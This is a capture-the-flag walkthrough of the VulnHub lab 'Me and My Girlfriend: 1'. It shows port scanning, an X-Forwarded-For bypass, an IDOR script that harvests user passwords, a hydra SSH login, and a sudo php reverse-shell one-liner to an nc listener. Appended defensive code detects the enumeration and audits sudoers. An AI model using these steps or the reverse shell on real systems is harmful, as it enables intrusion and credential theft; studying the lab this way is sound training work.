Me-and-My-Girlfriend-1

Download: Me and My Girlfriend: 1 ~ VulnHub

1 Information gathering

1.1 Port scan

┌──(kali㉿kali)-[~]
└─$ nmap -sV -T4 -p - 192.168.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:54 CST
Nmap scan report for 192.168.0.3
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 Directory scan

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.0.3/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[20:43:35] Starting:
[20:43:35] 301 - 308B - /misc -> http://192.168.0.3/misc/
[20:43:38] 301 - 310B - /config -> http://192.168.0.3/config/
[20:56:50] 200 - 120B - /index.php
[20:56:58] 200 - 32B - /robots.txt
[20:47:35] 403 - 291B - /server-status
Task Completed

1.2.1 Directory analysis

  1. Visiting http://192.168.0.3/ shows an IP restriction; the page source reveals that it can be bypassed with an X-Forwarded-For header

  2. Install the Firefox add-on "X-Forwarded-For Header", set the IP address to 127.0.0.1 and select X-Forwarded-For as the request header

  3. With the add-on enabled the target site is reachable: http://192.168.0.3/?page=index

  4. Register a user named test on the site

  5. Log in to the dashboard: http://192.168.0.3/index.php?page=dashboard

  6. On http://192.168.0.3/index.php?page=profile&user_id=12 try horizontal privilege escalation (IDOR) by changing user_id=12 to user_id=1

    # user record obtained through the IDOR:
    Eweuh Tandingan
    eweuhtandingan
    skuyatuh
  7. Write a script to collect every user's username and password:

    import re
    import requests

    def get_user_pass(uid):
        t_url = 'http://192.168.0.3/index.php?page=profile&user_id=%s' % uid
        t_cookie = {"PHPSESSID": "ua2kg2n1inkvdbdcohitotsgg5"}   # session of the registered test user
        t_headers = {"X-Forwarded-For": "127.0.0.1"}             # needed to pass the IP restriction
        getreq = requests.get(url=t_url, cookies=t_cookie, headers=t_headers).text

        # each field is an <input id="..." value="..."> on the profile page;
        # an unused user_id has no such field, so return None instead of raising
        def field(name):
            m = re.search(r'id="%s" value="(.*?)">' % name, getreq)
            return m.group(1) if m else None

        return field("name"), field("username"), field("password")

    if __name__ == '__main__':
        for i in range(20):
            getname, getusername, getpasswd = get_user_pass(i)
            if getname:
                print("%s:%s" % (getusername, getpasswd))
  8. Results:

    eweuhtandingan:skuyatuh
    aingmaung:qwerty!!!
    sundatea:indONEsia
    sedihaingmah:cedihhihihi
    alice:4lic3
    abdikasepak:dorrrrr
    test:Admin123
  9. http://192.168.0.3/robots.txt

  10. http://192.168.0.3/heyhoo.txt
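From the defender's side the enumeration above leaves two clear traces in the web server log: one client fetching many distinct user_id profiles within seconds, and an X-Forwarded-For header arriving directly from a client rather than from a reverse proxy. The script below is an added example, not part of the original writeup; it assumes Apache combined-format logs extended with a trailing "%{X-Forwarded-For}i" field, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: Apache combined format plus a trailing "%{X-Forwarded-For}i" field.
SAMPLE_LOG = """\
192.168.0.2 - - [07/Mar/2022:20:58:01 +0800] "GET /index.php?page=profile&user_id=1 HTTP/1.1" 200 1530 "-" "python-requests/2.27.1" "127.0.0.1"
192.168.0.2 - - [07/Mar/2022:20:58:01 +0800] "GET /index.php?page=profile&user_id=2 HTTP/1.1" 200 1528 "-" "python-requests/2.27.1" "127.0.0.1"
192.168.0.2 - - [07/Mar/2022:20:58:02 +0800] "GET /index.php?page=profile&user_id=3 HTTP/1.1" 200 1531 "-" "python-requests/2.27.1" "127.0.0.1"
192.168.0.2 - - [07/Mar/2022:20:58:02 +0800] "GET /index.php?page=profile&user_id=4 HTTP/1.1" 200 1527 "-" "python-requests/2.27.1" "127.0.0.1"
192.168.0.2 - - [07/Mar/2022:20:58:03 +0800] "GET /index.php?page=profile&user_id=5 HTTP/1.1" 200 1529 "-" "python-requests/2.27.1" "127.0.0.1"
192.168.0.10 - - [07/Mar/2022:20:59:10 +0800] "GET /index.php?page=profile&user_id=12 HTTP/1.1" 200 1530 "-" "Mozilla/5.0" "-"
"""
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "[^"]*"(?: "(?P<xff>[^"]*)")?$')
USER_ID_RE = re.compile(r'[?&]user_id=(\d+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["xff"] = None if rec["xff"] in (None, "-") else rec["xff"]  # "-" means header absent
    return rec

def find_idor_enumeration(log_text, window=timedelta(minutes=5), min_ids=5):
    """Client IP -> sorted user_ids for clients reading >= min_ids distinct profiles in one window."""
    seen = defaultdict(list)                      # ip -> [(ts, user_id)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        m = rec and "page=profile" in rec["path"] and USER_ID_RE.search(rec["path"])
        if m:
            seen[rec["ip"]].append((rec["ts"], int(m.group(1))))
    flagged = {}
    for ip, events in seen.items():
        events.sort()
        for i, (t0, _) in enumerate(events):      # sliding window starting at each hit
            ids = {uid for t, uid in events[i:] if t - t0 <= window}
            if len(ids) >= min_ids:
                flagged[ip] = sorted(ids)
                break
    return flagged

def untrusted_forwarded_for(log_text, trusted_proxies=frozenset()):
    """(client, header) pairs where X-Forwarded-For came from a peer that is not a trusted proxy."""
    return [(r["ip"], r["xff"]) for r in map(parse_line, log_text.splitlines())
            if r and r["xff"] and r["ip"] not in trusted_proxies]
```

The application-side fix is the same lesson in reverse: honour X-Forwarded-For only when the TCP peer is a known proxy, and check that the requested user_id belongs to the session's own user before rendering the profile.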

2 GetShell

2.1 Try an SSH login with the collected credentials

# example syntax from hydra's help: hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -C user-pass ssh://192.168.0.3 # yields a valid SSH username and password
alice:4lic3
  • -C FILE: file in "login:pass" format, one pair per line

2.2 Login succeeded

# first flag
alice@gfriEND:~$ cat .my_secret/flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated! Now your last job is get access to the root and read the flag ^_^ Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

3 Privilege escalation

3.1 First attempt

sudo su - : fails

3.2 Enumerate the system

  1. Check /etc/passwd

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    libuuid:x:100:101::/var/lib/libuuid:
    syslog:x:101:104::/home/syslog:/bin/false
    messagebus:x:102:106::/var/run/dbus:/bin/false
    landscape:x:103:109::/var/lib/landscape:/bin/false
    alice:x:1000:1001:Alice Geulis,1337,+62,+62:/home/alice:/bin/bash
    eweuhtandingan:x:1001:1002:,,,:/home/eweuhtandingan:/bin/bash
    aingmaung:x:1002:1003:,,,:/home/aingmaung:/bin/bash
    sundatea:x:1003:1004:,,,:/home/sundatea:/bin/bash
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
  2. SUID binaries: nothing exploitable

    alice@gfriEND:~$ find / -perm -u=s 2>/dev/null
    /bin/ping6
    /bin/ping
    /bin/umount
    /bin/mount
    /bin/su
    /bin/fusermount
    /usr/bin/chsh
    /usr/bin/gpasswd
    /usr/bin/mtr
    /usr/bin/pkexec
    /usr/bin/at
    /usr/bin/traceroute6.iputils
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/sudo
    /usr/sbin/uuidd
    /usr/sbin/pppd
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
  3. Files owned by the local users: nothing of interest

    alice@gfriEND:~$ find / -user 1000  2>/dev/null
    /home/alice
    /home/alice/.bashrc
    /home/alice/.cache
    /home/alice/.cache/motd.legal-displayed
    /home/alice/.bash_logout
    /home/alice/.bash_history
    /home/alice/.profile
    /home/alice/.my_secret
    /home/alice/.my_secret/my_notes.txt
    alice@gfriEND:~$ find / -user 1001 2>/dev/null
    /home/eweuhtandingan
    /home/eweuhtandingan/.bashrc
    /home/eweuhtandingan/.bash_logout
    /home/eweuhtandingan/.profile
    alice@gfriEND:~$ find / -user 1002 2>/dev/null
    /home/aingmaung
    /home/aingmaung/.bashrc
    /home/aingmaung/.bash_logout
    /home/aingmaung/.profile
    alice@gfriEND:~$ find / -user 1003 2>/dev/null
    /home/sundatea
    /home/sundatea/.bashrc
    /home/sundatea/.bash_logout
    /home/sundatea/.profile
    alice@gfriEND:~$
  4. Look for sensitive files

    alice@gfriEND:/var/www/html$ cat config/config.php
    <?php $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
    alice@gfriEND:/var/www/html$
  5. Check whether alice has any sudo rights

    alice@gfriEND:~$ sudo -l
    Matching Defaults entries for alice on gfriEND:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User alice may run the following commands on gfriEND:
        (root) NOPASSWD: /usr/bin/php

3.3 Privilege escalation via sudo php

alice@gfriEND:~$ sudo php -r '$sock=fsockopen("192.168.0.2",2333);exec("/bin/bash -i <&3 >&3 2>&3");'
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 57734
root@gfriEND:~# cat flag2.txt
[ASCII-art banner]
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :) Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks!
Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:/root#
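The root cause is a single sudoers line: a NOPASSWD grant of /usr/bin/php to root, and an interpreter that can spawn a process is equivalent to granting a root shell. The audit below is an added example, not from the original writeup; it parses sudoers-style rules and flags passwordless root grants of ALL or of a shell-capable interpreter. The sample rules and the SHELL_CAPABLE set are constructed assumptions (the alice line mirrors what sudo -l showed above).

```python
import re
import shlex
from os.path import basename

# Interpreters/shells that give the caller a root shell outright when runnable
# as root without a password (assumed list; extend it for your own estate).
SHELL_CAPABLE = {"php", "python", "python2", "python3", "perl", "ruby", "sh", "bash"}

# Constructed sample in sudoers syntax; the alice line mirrors the lab's `sudo -l` output.
SAMPLE_SUDOERS = """\
Defaults env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
root    ALL=(ALL:ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/bin/php
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
%admin  ALL=(ALL) ALL
"""

RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$')

def parse_rules(text):
    """Yield (who, runas, nopasswd, command) per command in each user-spec line."""
    for line in text.splitlines():
        m = RULE_RE.match(line.split("#", 1)[0].strip())   # drop comments; Defaults never matches
        if not m:
            continue
        nopasswd = False                                    # a tag sticks until the next tag
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd.startswith("NOPASSWD:"):
                nopasswd, cmd = True, cmd[len("NOPASSWD:"):].strip()
            elif cmd.startswith("PASSWD:"):
                nopasswd, cmd = False, cmd[len("PASSWD:"):].strip()
            if cmd:
                yield m.group("who"), m.group("runas"), nopasswd, cmd

def risky_rules(text):
    """(who, command) for passwordless root grants of ALL or a shell-capable interpreter."""
    out = []
    for who, runas, nopasswd, cmd in parse_rules(text):
        exe = "ALL" if cmd == "ALL" else basename(shlex.split(cmd)[0])
        if nopasswd and runas.split(":")[0] in ("root", "ALL") and exe in SHELL_CAPABLE | {"ALL"}:
            out.append((who, cmd))
    return out
```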
